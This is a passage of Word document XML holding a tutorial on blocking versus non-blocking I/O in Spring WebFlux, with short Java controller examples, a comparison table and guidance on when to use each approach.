    <w:p w14:paraId="2EA48850"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7CB32D5">
          <v:rect id="_x0000_i2284" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="790E426C" w14:textId="651C47B9"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498" w:name="_Toc196307978"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between blocking and non-blocking in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="498"/>
    </w:p>
    <w:p w14:paraId="2C1B39CC" w14:textId="55470AE4" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D" w:rsidP="00A0015D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the terms </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refer to how I/O operations are handled during request processing, and they have a significant impact on the application's performance, scalability, and responsiveness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8522F9" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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Key Differences Between Blocking and Non-blocking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9B7875" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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1. Blocking I/O (Traditional Approach):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4068FDB7"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Synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In a blocking I/O model, each thread waits (blocks) until an I/O operation is completed (such as reading data from a database or calling an external API) before moving on to the next operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DA2DD3"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Thread Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a request is being processed, the thread is occupied and cannot handle other requests until the I/O operation completes. This means that each thread is tied to a specific request, even if the thread is idle, waiting for I/O operations to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1CB10C"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Performance Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: As the number of requests increases, the number of threads required to handle these requests grows, leading to thread contention, higher memory usage, and slower performance, especially in applications with a high number of I/O-bound operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C0F872"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Blocking I/O is commonly used in traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications or when interacting with non-reactive libraries (which don't support non-blocking I/O).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407F425"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502E1B43"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GetMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D8C1CB"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public String sayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8F4429"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    // Simulating a blocking operation (e.g., database query, file read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C36DAAB"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    String result = blockingService.getData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6FC309"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    return result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9A2648"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBB7537" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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2. Non-blocking I/O (Reactive Programming):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8CAFC0"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Asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In a non-blocking I/O model, threads are not blocked while waiting for I/O operations. Instead, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming paradigm</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) is used, where I/O operations are asynchronous, and the result is delivered to the application when ready, without holding up the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3F1A75"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Thread Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A thread can handle multiple requests concurrently. When an I/O operation is initiated, it does not block the thread; instead, the thread is free to handle other requests, and once the I/O operation completes, the response is provided back using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E7062C"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Performance Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Non-blocking I/O is ideal for handling a large number of concurrent requests, especially when many of them involve I/O-bound operations like database queries, file access, or external API calls. It allows for better resource utilization and increased throughput without the need for a high number of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E48FA3"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Non-blocking I/O is used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, where the application responds to requests asynchronously, and is well-suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly concurrent, I/O-bound, and real-time applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52674F42"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60587828"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GetMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0686ED"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public Mono&lt;String&gt; sayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E72F742"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    // Simulating a non-blocking operation (e.g., asynchronous database query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B846B8D"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    return reactiveService.getData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021EF27E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78497F52" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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Detailed Comparis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9"/>
        <w:gridCol w:w="4296"/>
        <w:gridCol w:w="4519"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="3399C5C0" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36A66BCC" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29823705" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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Blocking I/O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0385805B" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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Non-blocking I/O</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="472120E4" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D443469"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Execution Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C9B7BEF"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Synchronous (thread blocks until I/O operation completes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63EE46DB"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Asynchronous (thread does not block while waiting for I/O)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="0A2635E0" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CF7A2CB"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Thread Utilization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="232D2907"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One thread per request, causing potential thread contention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="168BBEDF"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Fewer threads handle more requests concurrently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="4A0C713A" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76ED8313"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Throughput</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10CA72A8"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Lower throughput as threads are blocked during I/O operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="419D4929"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Higher throughput due to better resource utilization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="2DDCB30B" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A6094E9"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Scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="463D9C7D"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Less scalable, higher resource consumption due to blocking threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44A94C30"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More scalable, handles high traffic with fewer resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="1DCA8599" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06CD6C2A"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Response Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11BB3F75"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Response time can be longer due to blocking of threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="577E27D2"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Response time is shorter, as threads are free to handle other requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="24A18E14" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D73FE0B"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Ideal Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65E5E66D"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Suitable for traditional applications with fewer concurrent requests or heavy CPU-bound tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FC5DC4F"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Suitable for applications with high concurrency and I/O-bound tasks (e.g., APIs, event-driven apps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64D464C3" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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Example of Blocking vs Non-blocking I/O in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432A8254" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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Blocking (Traditional Spring MVC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D6A329"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GetMapping("/getUser")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553E4325"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public String getUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A2C7D2"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    // Simulating blocking I/O operation (e.g., querying a database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD893EA"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    String user = userService.getUserFromDatabase(); // Blocks the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AF3C92"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    return user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B3683C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B28C4E" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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Non-blocking (Spring WebFlux):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BD7A41"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GetMapping("/getUser")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0407FB5D"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public Mono&lt;String&gt; getUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4142D9E7"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    // Simulating non-blocking I/O operation (e.g., asynchronous database query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE58D2"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    return userService.getUserFromDatabaseAsync(); // Returns a Mono without blocking the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07924B55"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1260A398" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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Key Benefits of Non-blocking I/O:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2070BC09"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lastRenderedPageBreak/>
        <w:t>Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Non-blocking I/O allows applications to handle a large number of concurrent connections with fewer threads. This makes the application more scalable, especially for I/O-bound operations like database queries or API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA797E"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Resource Efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With non-blocking I/O, threads are not idle while waiting for I/O to complete, leading to more efficient use of system resources (CPU and memory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0143908C"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Improved Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: As threads can handle more than one request at a time, the overall throughput of the system improves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180D0010" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D"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When to Use Blocking vs Non-blocking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C817F1"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Use Blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284B4B63" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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You have fewer concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97D40D" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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The application is CPU-bound rather than I/O-bound.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAEF4AE" w14:textId="77777777" w:rsidR="0045705D" w:rsidRPr="00A0015D" w:rsidRDefault="0045705D" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
